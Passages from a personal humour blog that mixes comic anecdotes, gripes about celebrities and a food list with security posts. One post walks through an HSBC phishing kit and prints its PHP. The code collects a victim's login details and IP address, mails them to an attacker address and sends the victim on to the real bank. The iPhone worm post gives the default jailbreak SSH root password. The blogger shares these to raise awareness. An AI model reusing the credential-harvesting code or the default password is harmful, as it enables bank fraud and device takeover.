shewy.co.uk

WARNING: THIS POST CONTAINS MILD PERIL

I pulled up outside my house earlier, put the handbrake on and turned off the ignition. You may have guessed at this point, I was in the car. I undid my seat belt, and tried to open the door. Notice I say tried. The wind was pushing so hard against the door, I couldn’t open it. I tried again. Still it wouldn’t budge. Confused and desperate I tried once more and finally, the door came open – just long enough for me to jump out. It was a life changing experience. What if I hadn’t of managed to escape? If I was trapped in the car all night. Here is how I predict it would of gone down -

Hour 1 – I would of tried over and over to open the door. Thus tiring myself out. I would have then put on my iPod which I had with me to take my mind off it. It would of had about four hours of battery life on it.

Hour 2 – I would be getting cold. So I would turn the ignition on and try to get some heat going. After a while the heater would of made me feel sick, so I would of turned it off, and got cold again.

Hour 3 – At this point I would be so cold, for comfort I would pretend that Lily Allen was singing to me while listening to my iPod.

Hour 4 – iPod battery dies. I then do that thing where I try to remember exactly how a Simpson’s episode goes and replay it in my head.

Hour 5 – I need to drink, so I start to lick my sweat and drink that. It tastes bad, but not as bad as Yakult.

Hour 6 – Feeling that death is imminent I would start to write my will on my mobile phone. I haven’t got an iPhone so I wouldn’t have an app for this.

Hour 7 – I would realise that all I needed to do was get out of the passenger door as that side of the car was shielded from the wind.

When I get a Phishing email I tend to examine it, to learn more about the way it works. I got a classic example today, so I’ll share with you how it works.

Delivery – It starts with an email, in this example – the message is supposed to be from HSBC.

Step One: Victim receives poorly worded Email, not from a drunk friend.

So I have to click on the link at the bottom, fair enough, it goes to hsbc.co.uk right? Err, actually no. Hovering the mouse over the link reveals it takes you to a random website. This could be any site that has been hacked, and had the phishing site files uploaded to it. In this case it was a photo framing company.

Reel Big Phish - So the victim clicks the link and heads off to the fake bank site. It looks pretty genuine. Internet Explorer and Firefox will alert if the site has been reported as a phishing site, so if this is a relatively new phish you may not get a warning. In this case IE did tell me I shouldn’t go to the site. I’ve removed the site’s domain name from the URL to protect the company in question, but you can see that the fake site has been set up in a subdirectory of the hacked site.

Step Two: This site is to HSBC as Katie Price is to Boobs.

Entering Details – So the victim enters their login details. The details are then secretly emailed to the phishermen (the bad guys who set up the site). Once the continue button has been pressed the vicitm is redirected to the real HSBC site, and told they have entered an incorrect password. They try again, and this time they login to the genuine site and think nothing of it – until they notice money missing from their bank account a few days later. All very scary.

So how exactly does the fake site email the details to the bad guys? Well, kindly, on this example the phishermen left an entire copy of the fake site in a zip file, so it is possible to examine the source code of the fake pages and find out. Source code, is basically a list of instructions performed by the server hosting a site. There are two elements to source code in web site development, client side and server side. Client Side code renders the page in your browser, so you can always see the results of client side code execution and even view the code if you want to. Server side code, is executed on the web server, and is not normally visible to end users. Thats us.

So in this example when a user enters details and presses the continue button, the following code is executed on the server side.

<?

$ip = getenv(“REMOTE_ADDR”);
$do = “mail”;
$message .= “————–USER———————–\n”;
$message .= “User ID         : “.$_POST['user'].”\n”;
$message .= “Date of Birth         : “.$_POST['dob'].”\n”;
$message .= “Security Number   : “.$_POST['securityno'].”\n”;
$message .= “IP                     : “.$ip.”\n”;
$message .= “————–I MUST RICH—————\n”;
$send = hacker1@randomfreeemailsite.com;
$subject = “HSBC UK | $user | $ip”;
$headers = “From: HSBC <hsbc@bank.co.uk>”;
$headers .= $_POST['name'].”\n”;
$headers .= “MIME-Version: 1.0\n”;
$arr=array($send, $IP);
{
mail($send,$subject,$message,$headers);
                $do($er,$subject,$message,$headers);
}
header(“Location:https://www.hsbc.co.uk/1/screens

/html/SessionWarning/jsp/ExitFusedSite.jsp”);
?>

This code does the following – Collect the Remote IP address of the victim, then get the values entered for User ID, Date of Birth and Security Number. The mail this information to the email address specified in the code. The email address is usually set up on a  free email host, in this example I have changed the actual email addresses used by the bad guys. Then finally it redirects the victim to the real HSBC site. Crafty swines.

So, a general rule, never follow links in emails. You don’t wanna get caught by the phishermen!

I used to love Peter Kay, I even have a signed DVD. Phoenix Nights, That Peter Kay Thing, Max and Paddy – brilliantly entertaining. The stand up shows were incredible, everyone loved them – it would have been easier to give everyone in the country a ticket, then people who didn’t want to go give their tickets back. I got well excited when I heard Peter was going to announce a new tour, I will definitely go to that I thought. There will probably be a show in Birmingham, there always is. If I can’t get tickets to Birmingham I could go somewhere else, Cardiff maybe. There will probably be 180ish dates.

No.

Four Dates.

Four.

“Well OK, is one of the four dates in Birmingham?”. I hear you ask.

No.

The first is Manchester, the second is Manchester, the third is Manchester, the fourth…Manchester.

That’s just silly. I feel really let down and I’m sure a lot of other Peter Kay fans feel the same. It seems that this four night run will be just long enough to cut together a DVD to be released in time for Christmas 2010. Why do a really good stand up tour when you can just bang out a DVD? For shame Peter, for shame.

Chicken Tikka Dhansak, Custard Cream Biscuits, Scones, Pizza, Egg and Bacon Bap’s, Muffins, Marks and Spencer White Chocolate Chip Cookies, a McFlurry, Bacon and Mushroom Pasta, Fish and Chips, Subway, Cheesecake, anything with Custard on, Flapjacks, Cheesy Chips at 3am, Fruit Loaf, American Pancakes, Fajitas, Eggy Bread, Burgers, Cheese and Pineapple on Cocktail Sticks, Fruit Pastille Lollies, Rice-Krispy Squares, Cherry Pie, Apple Crumble, Ginger Bread People, KFC Avalanche, Sweet Chilli Chicken, Sunday Roast, Crunchy Nut Cornflakes, Oatibix, Chicken Madras, Lamb Rogan Josh, Mongolian Beef, Sweet and Sour Pork Balls, Nachos, Steak, Jacket Potatoes covered in Cheese and Baked Beans, Rice Pudding, Chicken Korma, Chunky Chips, Fish Finger Sandwiches, Banana Chips, Doritos and Salsa Dip..

I’ve always considered Calvin Harris to be a bit, mopey, boring and Scottish for my liking. His music is OK, it’s better after a few drinks, but hardly groundbreaking. He did jump about a million points in my estimation though, the moment he decided to run onto the X-Factor stage during a performance by “Jedward” brandishing a pineapple. I wasn’t watching at the time, I was busy, existing.

25% of the pricks in this photo are on the surface of the pineapple.

Calvin said afterwards that it was all a serious point, showing how Simon Cowell had domination of the charts and was ruining music. Descending the show to the point of farce he would prove that the show was not about the music, but merely a comedy fest. It’s a good point, but a stupid one – for this reason. Any true music fan is already aware of this. Simon Cowell may dominate the “official” charts with his army of heavily auto-tuned, anorexic pop-starlets – but he is nowhere to be found in the most important chart of them all, the one that exists only in my head.

I chose what to listen to, and I listen to it. You all probably do the same. We live in the iPod age, if we don’t like the mainstream it has never been easier to set up our own tributary of indie, techno, nu-rave, metal, rock, hip-hop or James Blunt.  I could, if I wanted to, record an album on my PC tonight, and have it released on iTunes in the morning. My music would be availible worldwide, instantly. Then if anyone wanted to listen to it, they could.

So Calvin, don’t worry about Mr Cowell, peddling his  bollocks - in full view of everyone, due to having his trousers pulled up so tight. Keep making your music, if people love it, it’ll sell. Oh, and cheer up.

I recently headed to the Cinema, only to be turned around because there was a power cut. Not an exciting story. I tried again a couple of days later – success! Now which film..it was narrowed down to The Fourth Kind and Jennifer’s Body. Jennifer’s Body started off the clear winner, it was written by Diablo Cody, who wrote Juno, which was pretty good, and of course it has the Megan Fox edge. Megan Fox equals several very large ticks in many boxes. However, the Fourth Kind was chosen on the basis of good reviews.

The film is good, it’s different and it is scary, on one condition. Do not Google around for information before viewing, do so afterwards, the day after you have seen the film. Google and IMDB will ruin the fun!

I’ll probably get Jennifer’s Body on DVD, and take advantage of the pause function on my DVD player.

The T-Mobile Couple

This really angers me, in a way I can’t explain. These two are the most annoying people on telly at the mo. She is beautiful, she looks really clever and is probably quite friendly. He is the biggest super-chump that ever roamed the planet, he looks like a young Goldmember for christ’s sake. He’s tries to be funny. He isn’t. Yet, she is laughing at him all through the interview, making all kinds of faces, like he is so ace. She is wrapped around his little finger. Arse. He must have money.

Interesting to hear that good ol’ Microsoft won a patent today, on a truly original idea. Imagine being able to be logged in as a normal user, and then if you need run a command as a more powerful user, being able to do so without having to log out and log back in again. All you need to do is enter a password. Wow. That’s a really clever idea. Well done Microsoft. Oh, but hold on a sec…I’m sure that I’ve come across something slightly similar in Linux..oh yeah..I’ve pretty much just described the “sudo” command. I’m quite pleased though really, if more Unix stuff finds its way into Windows it’ll probably improve it.

Yesterday I wrote about the first worm to attack the iPhone, I mentioned how it wasn’t all that nasty, but probably would inspire nasty worms. I was right, yay! “iPhone-Privacy-A” – This works on the same principle as the RickRolling worm, but it’ll steal user data and then delete it, without letting you know it’s been there. Nice. So be careful, and like I said yesterday if you use a Jail-Broken iPhone with SSH installed – change the password!

The first “Worm” to attack the Apple iPhone has been created and deployed into the wild in Australia, where it is spreading like…erm…yeah I won’t say that, probably a bit too soon.  There have been various other exploits against iPhone’s in the past, but this is slightly different, as it is a worm, it quickly self replicates and spreads, a bit like Davina McCall.

There are two reasons why you shouldn’t panic. One – it ain’t a nasty worm. It changes the wallpaper on the iPhone to a pic of Rick Astley. In fact, if Rick Astley had an iPhone, he probably wouldn’t mind getting the worm. Two – it only affects “Jailbroken” iPhones, that is iPhones that have been modded to remove Apple’s in built security and have secure shell (SSH) installed. It spreads using SSH and the default root password, which is “alpine”.  So really, it’s more of a Linux worm.

The time to panic will come if malicious hackers start to build cleverer payloads, that steal or destroy the phone’s contents.  Which, trust me, they will. In fact, they probably already have. It’s worth remembering, if you have an iPhone, or even an iPod, it should be treated in exactly the same manner as your home PC or laptop when it comes to security, because it is a tiny computer.

The number of iPhones in the wild has jumped significantly today, as Orange customers in the UK can now go get one, and I’m sure a few O2 customers have jumped ship too. Go and check out the difference in the two providers 3G networks if you want to know why!

Now I’m going to go eat some fruit, what with all this talk of apples and oranges…